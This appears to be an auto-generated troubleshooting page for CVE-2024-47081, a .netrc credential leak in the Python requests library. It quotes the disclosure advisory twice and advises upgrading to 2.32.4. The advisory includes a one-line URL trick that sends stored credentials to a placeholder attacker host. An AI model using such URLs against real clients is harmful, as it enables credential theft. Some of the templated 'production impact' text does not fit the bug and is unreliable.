The Fix
pip install requests==2.32.4
Based on closed psf/requests issue #6964 · PR/commit linked
Production note: Most teams hit this during upgrades or environment changes. Roll out with a canary and smoke critical endpoints (health, OpenAPI/docs) before 100%.
@@ -236,13 +236,7 @@ def get_netrc_auth(url, raise_errors=False):
ri = urlparse(url)
-
- # Strip port numbers from netloc. This weird `if...encode`` dance is
- # used for Python 3.2, which doesn't support unicode literals.
repro.py
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('[http://example.com:@evil.com/&apos](http://[email protected]/&apos);)
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
verify
Re-run the minimal reproduction on your broken version, then apply the fix and re-run.
fix.md
Option A — Upgrade to fixed release\npip install requests==2.32.4\nWhen NOT to use: Do not use this fix if your application relies on netloc for authentication.\n\n
Why This Fix Works in Production
- Trigger: CVE-2024-47081: Netrc credential leak in PSF requests library
- Mechanism: Addresses CVE-2024-47081 by modifying the netrc lookup to only use the hostname, preventing credential leaks.
- Why the fix works: Addresses CVE-2024-47081 by modifying the netrc lookup to only use the hostname, preventing credential leaks. (first fixed release: 2.32.4).
Production impact:
- If left unfixed, the same config can fail only in production (env differences), causing startup failures or partial feature outages.
Why This Breaks in Prod
- Production symptom (often without a traceback): CVE-2024-47081: Netrc credential leak in PSF requests library
Proof / Evidence
- GitHub issue: #6964
- Fix PR: https://github.com/psf/requests/pull/6965
- First fixed release: 2.32.4
- Reproduced locally: No (not executed)
- Last verified: 2026-02-09
- Confidence: 0.95
- Did this fix it?: Yes (upstream fix exists)
- Own content ratio: 0.36
Discussion
High-signal excerpts from the issue thread (symptoms, repros, edge-cases).
“So.. will we have a release that contains those fixes? 🤔 It's been more than a week already”
“I would contact your vendor, this isn't an issue with Requests.”
“This issue does seem ongoing. Still getting the issue CVE-2024-47081 against version 2.32.4”
“Hi,please,https://github.com/psf/requests/pull/6965 is the fix CVE-2024-47081?”
Failure Signature (Search String)
- CVE-2024-47081: Netrc credential leak in PSF requests library
- There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
Copy-friendly signature
signature.txt
Failure Signature
-----------------
CVE-2024-47081: Netrc credential leak in PSF requests library
There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
Error Message
Signature-only (no traceback captured)
error.txt
Error Message
-------------
CVE-2024-47081: Netrc credential leak in PSF requests library
There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
Minimal Reproduction
repro.py
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('[http://example.com:@evil.com/&apos](http://[email protected]/&apos);)
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
Fix Options (Details)
Option A — Upgrade to fixed release Safe default (recommended)
pip install requests==2.32.4
When NOT to use: Do not use this fix if your application relies on netloc for authentication.
Use when you can deploy the upstream fix. It is usually lower-risk than long-lived workarounds.
Fix reference: https://github.com/psf/requests/pull/6965
First fixed release: 2.32.4
Last verified: 2026-02-09. Validate in your environment.
When NOT to Use This Fix
- Do not use this fix if your application relies on netloc for authentication.
Verify Fix
verify
Re-run the minimal reproduction on your broken version, then apply the fix and re-run.
Did This Fix Work in Your Case?
Quick signal helps us prioritize which fixes to verify and improve.
Prevention
- Capture the exact failing error string in logs and tests so you can reproduce via a minimal script.
- Pin production dependencies and upgrade only with a reproducible test that hits the failing path.
Version Compatibility Table
| Version | Status |
|---|---|
| 2.32.4 | Fixed |
Related Issues
No related fixes found.
Sources
We don’t republish the full GitHub discussion text. Use the links above for context.